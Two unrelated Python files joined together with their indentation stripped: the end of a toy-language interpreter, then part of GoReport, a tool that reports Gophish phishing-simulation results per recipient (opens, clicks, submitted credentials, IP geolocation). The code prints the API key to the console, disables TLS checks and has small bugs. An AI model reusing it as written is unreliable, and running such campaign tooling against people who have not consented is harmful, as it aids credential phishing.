elements = eval_expression(node.elements, env)
if len(elements) == 1 and is_error(elements[0]):
return elements[0]
arr = object.Array()
arr.elements = elements
return arr
elif isinstance(node, ast.IndexExpression):
left = evals(node.left, env)
if is_error(left):
return left
index = evals(node.index, env)
if is_error(index):
return index
return eval_indexexpression(left, index)
elif isinstance(node, ast.HashLiteral):
return eval_hashliteral(node, env)
# expressions
elif isinstance(node, ast.IntegerLiteral):
return object.Integer(value=node.value)
elif isinstance(node, ast.Boolean):
return native_bool_2_boolean_object(node.value)
elif isinstance(node, ast.StringLiteral):
return object.String(value=node.value)
elif isinstance(node, ast.PrefixExpression):
right = evals(node.right, env)
if is_error(right):
return right
return eval_prefix_expression(node.operator, right)
elif isinstance(node, ast.InfixExpression):
left = evals(node.left, env)
if is_error(left):
return left
right = evals(node.right, env)
if is_error(right):
return right
return eval_infix_expression(node.operator, left, right)
elif isinstance(node, ast.IfExpression):
return eval_ifexpression(node, env)
elif isinstance(node, ast.Identifier):
return eval_identifier(node, env)
elif isinstance(node, ast.FunctionLiteral):
params = node.parameters
body = node.body
return object.Function(params=params,
env=env,
body=body)
elif isinstance(node, ast.CallExpression):
function = evals(node.function, env)
if is_error(function):
return function
args = eval_expression(node.arguments, env)
if len(args) == 1 and is_error(args[0]):
return args[0]
return apply_function(function, args)
else:
return None
def apply_function(fn: object.Object, args: List[object.Object]) -> object.Object:
if isinstance(fn, object.Function):
extend_env = extend_function_env(fn, args)
evaluated = evals(fn.body, extend_env)
return unwrap_return_value(evaluated)
elif isinstance(fn, object.Builtin):
return fn.fn(args)
else:
return new_error('not a function: {}'.format(fn.type()))
def extend_function_env(fn: object.Function,
args: List[object.Object]) -> environment.Environment:
en_env = environment.EnvironmentEnclosed()
en_env.store = fn.env.store
env = environment.new_enclosed_environment(en_env)
for ind, param in enumerate(fn.parameters):
env.set(param.value, args[ind])
return env
def unwrap_return_value(obj: object.Object) -> object.Object:
if isinstance(obj, object.ReturnValue):
return obj.value
return obj
def eval_expression(exps: List[ast.Expression],
env: environment.Environment) -> List[object.Object]:
result = []
for e in exps:
evaluated = evals(e, env)
if is_error(evaluated):
return [evaluated]
result.append(evaluated)
return result
def eval_identifier(node: ast.Identifier, env: environment.Environment) -> object.Object:
val, ok = env.get(node.value)
if ok:
return val
built_in = builtin_function.builtin_func.get(node.value, 'error')
if built_in != 'error':
return built_in
return new_error('identifier not found: ' + node.value)
def eval_block_statement(block: ast.BlockStatement, env: environment.Environment) -> object.Object:
result = object.Object()
for stmt in block.statements:
result = evals(stmt, env)
if result is not None:
rt = result.type()
if rt == object.ObjectType.RETURN_VALUE_OBJ or rt == object.ObjectType.ERROR_OBJ:
return result
return result
def eval_program(program: ast.Programs, env: environment.Environment) -> object.Object:
result = object.Object()
for stmt in program.statements:
result = evals(stmt, env)
if isinstance(result, object.ReturnValue):
return result.value
elif isinstance(result, object.Error):
return result
return result
def eval_ifexpression(ie: ast.IfExpression, env: environment.Environment) -> object.Object:
condition = evals(ie.condition, env)
if is_error(condition):
return condition
if is_truthy(condition):
return evals(ie.consequence, env)
elif ie.alternative is not None:
return evals(ie.alternative, env)
else:
return NULL
def is_truthy(obj: object.Object) -> bool:
if obj == NULL:
return False
elif obj == TRUE:
return True
elif obj == FALSE:
return False
else:
return True
def eval_infix_expression(operator: str, left: object.Object, right: object.Object) -> object.Object:
if left.type() == object.ObjectType.INTEGER_OBJ and right.type() == object.ObjectType.INTEGER_OBJ:
return eval_integer_infixexpression(operator, left, right)
elif left.type() == object.ObjectType.STRING_OBJ and right.type() == object.ObjectType.STRING_OBJ:
return eval_string_infixexpression(operator, left, right)
elif operator == '==':
return native_bool_2_boolean_object(left == right)
elif operator == '!=':
return native_bool_2_boolean_object(left != right)
elif left.type() != right.type():
return new_error('type mismatch: {} {} {}'.format(left.type().value,
operator,
right.type().value))
else:
return new_error('unknown operator: {} {} {}'.format(left.type().value,
operator,
right.type().value))
def eval_indexexpression(left: object.Object, index: object.Object) -> object.Object:
if left.type() == object.ObjectType.ARRAY_OBJ and index.type() == object.ObjectType.INTEGER_OBJ:
return eval_arrayindexexpression(left, index)
elif left.type() == object.ObjectType.HASH_OBJ:
return eval_hashindexexpression(left, index)
else:
return new_error('index operator not supported: {}'.format(left.type().value))
def eval_hashindexexpression(hash: object.Object, index: object.Object) -> object.Object:
if not isinstance(index, object.Hashable):
return new_error('unusable as hash key: {}'.format(index.type()))
pair = hash.pairs.get(index.hash_key(), 'error')
if pair == 'error':
return NULL
return pair.value
def eval_arrayindexexpression(array: object.Object, index: object.Object) -> object.Object:
ind = index.value
max_index = len(array.elements) - 1
if ind < 0 or ind > max_index:
return NULL
return array.elements[ind]
def eval_string_infixexpression(operator: str, left: object.Object, right: object.Object) -> object.Object:
if operator != '+':
return new_error('unknown operator: {} {} {}'.format(left.type().value, operator, right.type().value))
left_val = left.value
right_val = right.value
return object.String(value=left_val+right_val)
def eval_integer_infixexpression(operator: str, left: object.Object, right: object.Object) -> object.Object:
left_val = left.value
right_val = right.value
if operator == '+':
return object.Integer(value=left_val + right_val)
elif operator == '-':
return object.Integer(value=left_val - right_val)
elif operator == '*':
return object.Integer(value=left_val * right_val)
elif operator == '/':
return object.Integer(value=left_val // right_val)
elif operator == '<':
return native_bool_2_boolean_object(left_val < right_val)
elif operator == '>':
return native_bool_2_boolean_object(left_val > right_val)
elif operator == '==':
return native_bool_2_boolean_object(left_val == right_val)
elif operator == '!=':
return native_bool_2_boolean_object(left_val != right_val)
else:
return new_error('unknown operator: {} {} {}'.format(left.type().value,
operator,
right.type().value))
def eval_prefix_expression(operator: str, right: object.Object) -> object.Object:
if operator == '!':
return eval_bang_operator_expression(right)
elif operator == '-':
return eval_minus_prefixoperator_expression(right)
else:
return new_error('unknown operator: {}{}'.format(operator, right.type().value))
def eval_bang_operator_expression(right: object.Object) -> object.Object:
if right == TRUE:
return FALSE
elif right == FALSE:
return TRUE
elif right == NULL:
return TRUE
else:
return FALSE
def eval_minus_prefixoperator_expression(right: object.Object) -> object.Object:
if right.type() != object.ObjectType.INTEGER_OBJ:
return new_error('unknown operator: -{}'.format(right.type().value))
value = right.value
return object.Integer(value=-value)
def native_bool_2_boolean_object(input: bool) -> object.Boolean:
if input:
return TRUE
else:
return FALSE
def eval_statements(stmts: List[ast.Statement], env: environment.Environment) -> object.Object:
result = object.Object()
for statement in stmts:
result = evals(statement, env)
if isinstance(result, object.ReturnValue):
return result.value
return result
def new_error(err_msg: str) -> object.Error:
return object.Error(msg=err_msg)
def is_error(obj: object.Object) -> bool:
if obj is not None:
return obj.type() == object.ObjectType.ERROR_OBJ
return False
def eval_hashliteral(node: ast.HashLiteral, env: environment.Environment) -> object.Object:
pairs = {}
for k, v in node.pairs.items():
key = evals(k, env)
if is_error(key):
return key
if not isinstance(key, object.Hashable):
return new_error('unusable as hash key: {}'.format(key.type()))
value = evals(v, env)
if is_error(value):
return value
hashed = key.hash_key()
pairs[hashed] = object.HashPair(key=key, value=value)
return object.Hash(pairs=pairs)
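# Hedged, self-contained smoke test. It only exercises helpers defined in this
# module plus object.Integer, whose keyword constructor is already used above;
# nodes from the local `ast` module are not constructed here because their
# constructor signatures are not shown in this file.
if __name__ == '__main__':
    five = object.Integer(value=5)
    three = object.Integer(value=3)
    # 5 + 3 evaluates to an Integer with value 8
    print(eval_integer_infixexpression('+', five, three).value)
    # !true evaluates to the shared FALSE singleton
    print(eval_prefix_expression('!', TRUE) is FALSE)
    # -5 evaluates to an Integer with value -5
    print(eval_minus_prefixoperator_expression(five).value)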
|
the-stack_0_25884
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""This is the GoReport class. GoReport handles everything from connecting to the target Gophish
server to pulling campaign information and reporting the results.
"""
# Try to import gophish
try:
from gophish import Gophish
except:
print("[!] Could not import the Gophish library! Make sure it is installed.\n\
Run: `python3 -m pip install gophish`\n\
Test it by running `python3` and then, in the \
Python prompt, typing `from gophish import Gophish`.")
exit()
# Imports for statistics, e.g. browsers and operating systems
from user_agents import parse
from collections import Counter, OrderedDict
# Import for writing the Excel xlsx report
import xlsxwriter
# Imports for writing the Word docx report
import os.path
from docx import *
from docx.shared import *
from docx.enum.text import WD_ALIGN_PARAGRAPH
from docx.enum.style import WD_STYLE_TYPE
from docx.enum.table import WD_TABLE_ALIGNMENT
from docx.oxml.shared import OxmlElement, qn
# Basic imports
import sys
import configparser
import time
# Imports for web requests, e.g. Google Maps API for location data
# Disables the insecure HTTPS warning for the self-signed Gophish certs
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class Goreport(object):
"""This class uses the Gophish library to create a new Gophish API connection
and queries Gophish for information and results related to the specified
campaign ID(s).
"""
# Name of the config file -- default is gophish.config
goreport_config_file = "gophish.config"
verbose = False
# Variables for holding Gophish models
results = None
campaign = None
timeline = None
# Variables for holding campaign information
cam_id = None
cam_url = None
cam_name = None
cam_status = None
launch_date = None
created_date = None
cam_page_name = None
cam_smtp_host = None
completed_date = None
cam_redirect_url = None
cam_from_address = None
cam_subject_line = None
cam_template_name = None
cam_capturing_passwords = None
cam_capturing_credentials = None
# Variables and lists for tracking event numbers
total_sent = 0
total_opened = 0
total_targets = 0
total_clicked = 0
total_reported = 0
total_submitted = 0
total_unique_opened = 0
total_unique_clicked = 0
total_unique_reported = 0
total_unique_submitted = 0
targets_opened = []
targets_clicked = []
targets_reported = []
targets_submitted = []
# Lists and dicts for holding prepared report data
campaign_results_summary = []
# Lists for holding totals for statistics
browsers = []
locations = []
ip_addresses = []
ip_and_location = {}
operating_systems = []
# Output options
report_format = None
output_word_report = None
output_xlsx_report = None
xlsx_header_bg_color = "#0085CA"
xlsx_header_font_color = "#FFFFFF"
def __init__(self, report_format, config_file, google, verbose):
"""Initiate the connection to the Gophish server with the provided host,
port, and API key and prepare to use the external APIs.
"""
try:
# Check if an alternate config file was provided
if config_file:
self.goreport_config_file = config_file
# Open the config file to make sure it exists and is readable
config = configparser.ConfigParser()
config.read(self.goreport_config_file)
except Exception as e:
print("[!] Could not open {} -- make sure it exists and is readable.".format(self.goreport_config_file))
print("L.. Details: {}".format(e))
sys.exit()
try:
# Read in the values from the config file
GP_HOST = self.config_section_map(config, 'Gophish')['gp_host']
API_KEY = self.config_section_map(config, 'Gophish')['api_key']
except Exception as e:
print("[!] There was a problem reading values from the gophish.config file!")
print("L.. Details: {}".format(e))
sys.exit()
try:
# Read in the values from the config file
self.IPINFO_TOKEN = self.config_section_map(config, 'ipinfo.io')['ipinfo_token']
if not self.IPINFO_TOKEN:
self.IPINFO_TOKEN = None
except Exception as e:
self.IPINFO_TOKEN = None
print("[!] No ipinfo.io API token was found in the config. GoReport will not lookup IP addresses with ipinfo.io for additional location data.")
try:
# Read in the values from the config file
self.GEOLOCATE_TOKEN = self.config_section_map(config, 'Google')['geolocate_key']
if not self.GEOLOCATE_TOKEN:
self.GEOLOCATE_TOKEN = None
except Exception as e:
self.GEOLOCATE_TOKEN = None
if google:
print("[!] No Google Maps API token was found in the config so GoReport will ignore the `--google` flag.")
# Set command line options for the GoReport object
self.google = google
self.verbose = verbose
self.report_format = report_format
# Connect to the Gophish API
# NOTE: This step succeeds even with a bad API key, so the true test is fetching an ID
print("[+] Connecting to Gophish at {}".format(GP_HOST))
print("L.. The API Authorization endpoint is: {}/api/campaigns/?api_key={}".format(GP_HOST, API_KEY))
self.api = Gophish(API_KEY, host=GP_HOST, verify=False)
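# Hedged example of a gophish.config that satisfies the reads above (the section
# and key names come from the config_section_map() calls; the values are
# placeholders, not real credentials):
#   [Gophish]
#   gp_host: https://127.0.0.1:3333
#   api_key: <YOUR_GOPHISH_API_KEY>
#   [ipinfo.io]
#   ipinfo_token: <OPTIONAL_IPINFO_TOKEN>
#   [Google]
#   geolocate_key: <OPTIONAL_GOOGLE_MAPS_KEY>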
def run(self, id_list, combine_reports, set_complete_status):
"""Run everything to process the target campaign."""
# Output some feedback for user options
if combine_reports:
print("[+] Campaign results will be combined into a single report.")
if set_complete_status:
print('[+] Campaign statuses will be set to "Complete" after processing the results.')
try:
# Create the list of campaign IDs
temp_id = []
# Handle a mixed set of ranges and comma-separated IDs
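# Worked example: an id_list of "5,50-52,71" expands to
# ['5', '50', '51', '52', '71'] before duplicates are removed and the
# list is sorted numerically below.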
if "-" and "," in id_list:
temp = id_list.split(",")
for x in temp:
if "-" in x:
lower = x.split("-")[0]
upper = x.split("-")[1]
for y in range(int(lower), int(upper) + 1):
temp_id.append(str(y))
else:
temp_id.append(x)
# Process IDs provided as one or more ranges
elif "-" in id_list:
lower = id_list.split("-")[0]
upper = id_list.split("-")[1]
for y in range(int(lower), int(upper) + 1):
temp_id.append(str(y))
# Process single or only comma-separated IDs
else:
temp_id = id_list.split(",")
id_list = temp_id
except Exception as e:
print("[!] Could not interpret your provided campaign IDs. \
Ensure the IDs are provided as comma-separated integers or integer ranges, e.g. 5,50-55,71.")
print("L.. Details: {}".format(e))
sys.exit()
# Begin processing the campaign IDs by removing any duplicates
try:
# Get length of user-provided list
initial_len = len(id_list)
# Remove duplicate IDs and sort IDs as integers
id_list = sorted(set(id_list), key=int)
# Get length of unique, sorted list
unique_len = len(id_list)
except Exception as e:
temp = []
for id in id_list:
try:
int(id)
except:
temp.append(id)
print("[!] There are {} invalid campaign ID(s), i.e. not an integer.".format(len(temp)))
print("L.. Offending IDs: {}".format(",".join(temp)))
sys.exit()
print("[+] A total of {} campaign IDs have been provided for processing.".format(initial_len))
# If the lengths are different, then GoReport removed one or more dupes
if initial_len != unique_len:
dupes = initial_len - unique_len
print("L.. GoReport found {} duplicate campaign IDs, so those have been trimmed.".format(dupes))
# Provide list of all IDs that will be processed
print("[+] GoReport will process the following campaign IDs: {}".format(",".join(id_list)))
# If --combine is used with just one ID it can break reporting, so we catch that here
if len(id_list) == 1 and combine_reports:
combine_reports = False
# Go through each campaign ID and get the results
campaign_counter = 1
for CAM_ID in id_list:
print("[+] Now fetching results for Campaign ID {} ({}/{}).".format(CAM_ID, campaign_counter, len(id_list)))
try:
# Request the details for the provided campaign ID
self.campaign = self.api.campaigns.get(campaign_id=CAM_ID)
except Exception as e:
print("[!] There was a problem fetching this campaign ID's details. \
Make sure your URL and API key are correct. Check HTTP vs HTTPS!".format(CAM_ID))
print("L.. Details: {}".format(e))
try:
try:
# Check to see if a success message was returned with a message
# Possible reasons: campaign ID doesn't exist or problem with host/API key
if self.campaign.success is False:
print("[!] Failed to get results for campaign ID {}".format(CAM_ID))
print("L.. Details: {}".format(self.campaign.message))
# We can't let an error with an ID stop reporting, so check if this was the last ID
if CAM_ID == id_list[-1] and combine_reports:
self.generate_report()
# If self.campaign.success does not exist then we were successful
except:
print("[+] Success!")
# Collect campaign details and process data
self.collect_all_campaign_info(combine_reports)
self.process_timeline_events(combine_reports)
self.process_results(combine_reports)
# If the --complete flag was set, now set campaign status to Complete
if set_complete_status:
print("[+] Setting campaign ID {}'s status to Complete.".format(CAM_ID))
try:
set_complete = self.api.campaigns.complete(CAM_ID)
try:
if set_complete.success is False:
print("[!] Failed to set campaign status for ID {}.".format(CAM_ID))
print("L.. Details: {}".format(set_complete.message))
# If set_complete.success does not exist then we were successful
except:
pass
except Exception as e:
print("[!] Failed to set campaign status for ID {}.".format(CAM_ID))
print("L.. Details: {}".format(e))
# Check if this is the last campaign ID in the list
# If this is the last ID and combined reports is on, generate the report
if CAM_ID == id_list[-1] and combine_reports:
self.generate_report()
# Otherwise, if we are not combining reports, generate the reports
elif combine_reports is False:
self.generate_report()
campaign_counter += 1
except Exception as e:
print("[!] There was a problem processing campaign ID {}!".format(CAM_ID))
print("L.. Details: {}".format(e))
sys.exit()
def lookup_ip(self, ip):
"""Lookup the provided IP address with ipinfo.io for location data.
Example Result:
{'ip': '52.44.93.197',
'hostname': 'ec2-52-44-93-197.compute-1.amazonaws.com',
'city': 'Beaumont',
'region': 'Texas',
'country': 'US',
'loc': '30.0866,-94.1274',
'postal': '77702',
'phone': '409',
'org': 'AS14618 Amazon.com, Inc.'}
"""
ipinfo_url = "https://ipinfo.io/{}?token={}".format(ip, self.IPINFO_TOKEN)
try:
r = requests.get(ipinfo_url)
return r.json()
except Exception as e:
print("[!] Failed to lookup {} with ipinfo.io.".format(ip))
return None
def get_google_location_data(self, lat, lon):
"""Use Google's Maps API to collect location info for the provided latitude and longitude.
Google returns a bunch of JSON with a variety of location data. This function returns
Google's pre-formatted `formatted_address` key for a human-readable address.
"""
google_maps_url = "https://maps.googleapis.com/maps/api/geocode/json?latlng={},{}&sensor=false&key={}".format(lat, lon, self.GEOLOCATE_TOKEN)
r = requests.get(google_maps_url)
maps_json = r.json()
if r.ok:
try:
if "error_message" in maps_json:
print("[!] Google Maps returned an error so using Gophish coordinates. Error: {}".format(maps_json['error_message']))
return "{}, {}".format(lat, lon)
first_result = maps_json['results'][0]
if "formatted_address" in first_result:
return first_result["formatted_address"]
# In case that key is ever unavailable try to assemble an address
else:
components = first_result['address_components']
country = town = state = None
for c in components:
if "country" in c['types']:
country = c['long_name']
if "locality" in c['types']:
town = c['long_name']
if "administrative_area_level_1" in c['types']:
state = c['long_name']
return "{}, {}, {}".format(town, state, country)
except Exception as e:
print("[!] Failed to parse Google Maps API results so using Gophish coordinates.")
print("L.. Error: {}".format(e))
return "{}, {}".format(lat, lon)
else:
print("[!] Failed to contact the Google Maps API so using Gophish coordinates. Status code: {}".format(r.status_code))
return "{}, {}".format(lat, lon)
def geolocate(self, target, ipaddr, google=False):
"""Attempt to get location data for the provided target and event. Will use ipinfo.io if an
API key is configured. Otherwise the Gophish latitude and longitude coordinates will be
returned. If `google` is set to True this function will try to match the coordinates to a
location using the Google Maps API.
Returns a string: City, Region, Country
"""
if ipaddr in self.ip_and_location:
return self.ip_and_location[ipaddr]
else:
if self.IPINFO_TOKEN:
# location_json = self.lookup_ip(event.details['browser']['address'])
location_json = self.lookup_ip(ipaddr)
if location_json:
city = region = country = "Unknown"
if "city" in location_json:
if location_json['city']:
city = location_json['city']
if "region" in location_json:
if location_json['region']:
region = location_json['region']
if "country" in location_json:
if location_json['country']:
country = location_json['country']
location = "{}, {}, {}".format(city, region, country)
else:
location = "{}, {}".format(target.latitude, target.longitude)
elif google:
if self.GEOLOCATE_TOKEN:
location = self.get_google_location_data(target.latitude, target.longitude)
else:
location = "{}, {}".format(target.latitude, target.longitude)
else:
location = "{}, {}".format(target.latitude, target.longitude)
self.locations.append(location)
self.ip_and_location[ipaddr] = location
return location
def compare_ip_addresses(self, target_ip, browser_ip, verbose):
"""Compare the IP addresses of the target to that of an event. The goal: Looking for a
mismatch that might identify some sort of interesting event. This might indicate an
email was forwarded, a VPN was switched on/off, or maybe the target is at home.
"""
if target_ip == browser_ip:
return target_ip
else:
# We have an IP mismatch -- hard to tell why this might be.
if verbose:
print("[*] Event: This target's ({}) URL was clicked from a browser at {}.".format(target_ip, browser_ip))
# This is an IP address not included in the results model, so we add it to our list here
self.ip_addresses.append(browser_ip)
return browser_ip
def get_basic_campaign_info(self):
""""Helper function to collect a campaign's basic details. This includes campaign name,
status, template, and other details that are not the campaign's results.
This keeps these calls in one place for tidiness and easier management.
"""
self.cam_name = self.campaign.name
self.cam_status = self.campaign.status
self.created_date = self.campaign.created_date
self.launch_date = self.campaign.launch_date
self.completed_date = self.campaign.completed_date
self.cam_url = self.campaign.url
# Collect SMTP information
self.smtp = self.campaign.smtp
self.cam_from_address = self.smtp.from_address
self.cam_smtp_host = self.smtp.host
# Collect the template information
self.template = self.campaign.template
self.cam_subject_line = self.template.subject
self.cam_template_name = self.template.name
self.cam_template_attachments = self.template.attachments
if self.cam_template_attachments == []:
self.cam_template_attachments = "None Used"
# Collect the landing page information
self.page = self.campaign.page
self.cam_page_name = self.page.name
self.cam_redirect_url = self.page.redirect_url
if self.cam_redirect_url == "":
self.cam_redirect_url = "Not Used"
self.cam_capturing_passwords = self.page.capture_passwords
self.cam_capturing_credentials = self.page.capture_credentials
def collect_all_campaign_info(self, combine_reports):
"""Collect the campaign's details and set values for each of the variables."""
# Collect the basic campaign details
try:
# Begin by checking if the ID is valid
self.cam_id = self.campaign.id
if combine_reports and self.cam_name is None:
print("[+] Reports will be combined -- setting name, dates, and URL based on campaign ID {}.".format(self.cam_id))
self.get_basic_campaign_info()
elif combine_reports is False:
self.get_basic_campaign_info()
# Collect the results and timeline lists
if self.results is None:
self.results = self.campaign.results
self.timeline = self.campaign.timeline
elif combine_reports:
self.results += self.campaign.results
self.timeline += self.campaign.timeline
else:
self.results = self.campaign.results
self.timeline = self.campaign.timeline
except:
print("[!] Looks like campaign ID {} does not exist! Skipping it...".format(self.cam_id))
def process_results(self, combine_reports):
"""Process the results model to collect basic data, like total targets and event details.
This should be run after the process_timeline_events() function which creates the
targets_* lists.
The results model can provide:
first_name, last_name, email, position, and IP address
"""
# Total length of results gives us the total number of targets
if combine_reports and self.total_targets is None:
self.total_targets = len(self.campaign.results)
elif combine_reports:
self.total_targets += len(self.campaign.results)
else:
# Reports will not be combined, so reset tracking between reports
self.total_targets = len(self.campaign.results)
self.ip_addresses = []
self.campaign_results_summary = []
# Go through all results and extract data for statistics
for target in self.campaign.results:
temp_dict = {}
# Log the IP address for additional statistics later
if not target.ip == "":
self.ip_addresses.append(target.ip)
self.geolocate(target, target.ip, self.google)
# Add all of the recipient's details and results to the temp dictionary
temp_dict["email"] = target.email
temp_dict["fname"] = target.first_name
temp_dict["lname"] = target.last_name
temp_dict["ip_address"] = target.ip
# Check if this target was recorded as viewing the email (tracking image)
if target.email in self.targets_opened:
temp_dict["opened"] = True
self.total_unique_opened += 1
else:
temp_dict["opened"] = False
# Check if this target clicked the link
if target.email in self.targets_clicked:
temp_dict["clicked"] = True
self.total_unique_clicked += 1
else:
temp_dict["clicked"] = False
# Check if this target submitted data
if target.email in self.targets_submitted:
temp_dict["submitted"] = True
self.total_unique_submitted += 1
else:
temp_dict["submitted"] = False
# Check if this target reported the email
if target.email in self.targets_reported:
temp_dict["reported"] = True
self.total_unique_reported += 1
else:
temp_dict["reported"] = False
# Append the temp dictionary to the event summary list
self.campaign_results_summary.append(temp_dict)
def process_timeline_events(self, combine_reports):
"""Process the timeline model to collect basic data, like total clicks, and get detailed
event data for recipients.
The timeline model contains all events that occurred during the campaign.
"""
# Create counters for enumeration
sent_counter = 0
click_counter = 0
opened_counter = 0
reported_counter = 0
submitted_counter = 0
# Run through all events and count each of the four basic events
for event in self.campaign.timeline:
if event.message == "Email Sent":
sent_counter += 1
elif event.message == "Email Opened":
opened_counter += 1
self.targets_opened.append(event.email)
elif event.message == "Clicked Link":
click_counter += 1
self.targets_clicked.append(event.email)
elif event.message == "Submitted Data":
submitted_counter += 1
self.targets_submitted.append(event.email)
elif event.message == "Email Reported":
reported_counter += 1
self.targets_reported.append(event.email)
# Assign the counter values to our tracking lists
if combine_reports:
# Append, +=, totals if combining reports
self.total_sent += sent_counter
self.total_opened += opened_counter
self.total_clicked += click_counter
self.total_reported += reported_counter
self.total_submitted += submitted_counter
else:
# Set tracking variables to current counter values for non-combined reports
self.total_sent = sent_counter
self.total_opened = opened_counter
self.total_clicked = click_counter
self.total_reported = reported_counter
self.total_submitted = submitted_counter
def generate_report(self):
"""Determines which type of report generate and the calls the appropriate reporting
functions.
"""
if self.report_format == "excel":
print("[+] Building the report -- you selected a Excel/xlsx report.")
self.output_xlsx_report = self._build_output_xlsx_file_name()
self.write_xlsx_report()
elif self.report_format == "word":
print("[+] Building the report -- you selected a Word/docx report.")
print("[+] Looking for the template.docx to be used for the Word report.")
if os.path.isfile("template.docx"):
print("[+] Template was found -- proceeding with report generation...")
print("L.. Word reports can take a while if you had a lot of recipients.")
self.output_word_report = self._build_output_word_file_name()
self.write_word_report()
else:
print("[!] Could not find the template document! Make sure 'template.docx' is in the GoReport directory.")
sys.exit()
elif self.report_format == "quick":
print("[+] Quick report stats:")
self.get_quick_stats()
def get_quick_stats(self):
"""Present quick stats for the campaign. Just basic numbers and some details."""
print()
print(self.cam_name)
print("Status:\t\t{}".format(self.cam_status))
print("Created:\t{} on {}".format(self.created_date.split("T")[1].split(".")[0],
self.created_date.split("T")[0]))
print("Started:\t{} on {}".format(self.launch_date.split("T")[1].split(".")[0],
self.launch_date.split("T")[0]))
if self.cam_status == "Completed":
print("Completed:\t{} on {}".format(self.completed_date.split("T")[1].split(".")[0],
self.completed_date.split("T")[0]))
print()
print("Total Targets:\t{}".format(self.total_targets))
print("Emails Sent:\t{}".format(self.total_sent))
print("IPs Seen:\t{}".format(len(self.ip_addresses)))
print()
print("Total Opened Events:\t\t{}".format(self.total_opened))
print("Total Click Events:\t\t{}".format(self.total_clicked))
print("Total Submitted Data Events:\t{}".format(self.total_submitted))
print()
print("Individuals Who Opened:\t\t\t{}".format(self.total_unique_opened))
print("Individuals Who Clicked:\t\t{}".format(self.total_unique_clicked))
print("Individuals Who Entered Data:\t\t{}".format(self.total_unique_submitted))
print("Individuals Who Reported the Email:\t{}".format(self.total_unique_reported))
def _build_output_xlsx_file_name(self):
"""Create the xlsx report name."""
xlsx_report = "Gophish Results for {}.xlsx".format(self.cam_name)
return xlsx_report
def _build_output_word_file_name(self):
"""Create the docx report name."""
word_report = "Gophish Results for {}.docx".format(self.cam_name)
return word_report
def _set_word_column_width(self, column, width):
"""Custom function for quickly and easily setting the width of a table's column in the Word
docx output.
This option is missing from the basic Python-docx library.
"""
for cell in column.cells:
cell.width = width
def write_xlsx_report(self):
"""Assemble and output the xlsx file report.
Throughout this function, results are assembled by adding commas and then adding to a
results string, i.e. 'result_A' and then 'result_A' += ',result_B'. This is so the
result can be written to the csv file and have the different pieces end up in the correct
columns.
"""
goreport_xlsx = xlsxwriter.Workbook(self.output_xlsx_report)
# Bold format
bold_format = goreport_xlsx.add_format({'bold': True})
bold_format.set_text_wrap()
bold_format.set_align('vcenter')
# Centered format
center_format = goreport_xlsx.add_format()
center_format.set_text_wrap()
center_format.set_align('vcenter')
center_format.set_align('center')
# Header format
header_format = goreport_xlsx.add_format({'bold': True})
header_format.set_text_wrap()
header_format.set_align('vcenter')
header_format.set_bg_color(self.xlsx_header_bg_color)
header_format.set_font_color(self.xlsx_header_font_color)
# Number cells
num_format = goreport_xlsx.add_format()
num_format.set_align('center')
# Boolean cells - True
true_format = goreport_xlsx.add_format({'bold': True})
true_format.set_text_wrap()
true_format.set_align('vcenter')
true_format.set_font_color("#9C0006")
true_format.set_bg_color("#FFC7CE")
# Boolean cells - False
false_format = goreport_xlsx.add_format()
false_format.set_text_wrap()
false_format.set_align('vcenter')
false_format.set_font_color("#006100")
false_format.set_bg_color("#C6EFCE")
# Remaining cells
wrap_format = goreport_xlsx.add_format()
wrap_format.set_text_wrap()
wrap_format.set_align('vcenter')
worksheet = goreport_xlsx.add_worksheet("Overview")
col = 0
row = 0
worksheet.set_column(0, 10, 62)
worksheet.write(row, col, "Campaign Results For:", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_name), wrap_format)
row += 1
worksheet.write(row, col, "Status", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_status), wrap_format)
row += 1
worksheet.write(row, col, "Created", bold_format)
worksheet.write(row, col+1, "{}".format(self.created_date), wrap_format)
row += 1
worksheet.write(row, col, "Started", bold_format)
worksheet.write(row, col+1, "{}".format(self.launch_date), wrap_format)
row += 1
if self.cam_status == "Completed":
worksheet.write(row, col, "Completed", bold_format)
worksheet.write(row, col+1, "{}".format(self.completed_date), wrap_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Campaign Details", bold_format)
row += 1
worksheet.write(row, col, "From", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_from_address), wrap_format)
row += 1
worksheet.write(row, col, "Subject", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_subject_line), wrap_format)
row += 1
worksheet.write(row, col, "Phish URL", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_url), wrap_format)
row += 1
worksheet.write(row, col, "Redirect URL", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_redirect_url), wrap_format)
row += 1
worksheet.write(row, col, "Attachment(s)", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_template_attachments), wrap_format)
row += 1
worksheet.write(row, col, "Captured Passwords", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_capturing_credentials), wrap_format)
row += 1
worksheet.write(row, col, "Stored Passwords", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_capturing_passwords), wrap_format)
row += 1
worksheet.write(row, col, "")
row += 1
# Write a high level summary for stats
worksheet.write(row, col, "High Level Results", bold_format)
row += 1
worksheet.write(row, col, "Total Targets", bold_format)
worksheet.write(row, col+1, self.total_targets, num_format)
row += 1
worksheet.write(row, col, "The following totals indicate how many events of each type Gophish recorded:", wrap_format)
row += 1
worksheet.write(row, col, "Total Opened Events", bold_format)
worksheet.write_number(row, col+1, self.total_opened, num_format)
row += 1
worksheet.write(row, col, "Total Clicked Events", bold_format)
worksheet.write_number(row, col+1, self.total_clicked, num_format)
row += 1
worksheet.write(row, col, "Total Submitted Data Events", bold_format)
worksheet.write(row, col+1, "", wrap_format)
row += 1
worksheet.write(row, col, "Total Report Events", bold_format)
worksheet.write_number(row, col+1, self.total_reported, num_format)
row += 1
worksheet.write(row, col, "The following totals indicate how many targets participated in each event type:", wrap_format)
row += 1
worksheet.write(row, col, "Individuals Who Opened", bold_format)
worksheet.write_number(row, col+1, self.total_unique_opened, num_format)
row += 1
worksheet.write(row, col, "Individuals Who Clicked", bold_format)
worksheet.write_number(row, col+1, self.total_unique_clicked, num_format)
row += 1
worksheet.write(row, col, "Individuals Who Submitted Data", bold_format)
worksheet.write_number(row, col+1, self.total_unique_submitted, num_format)
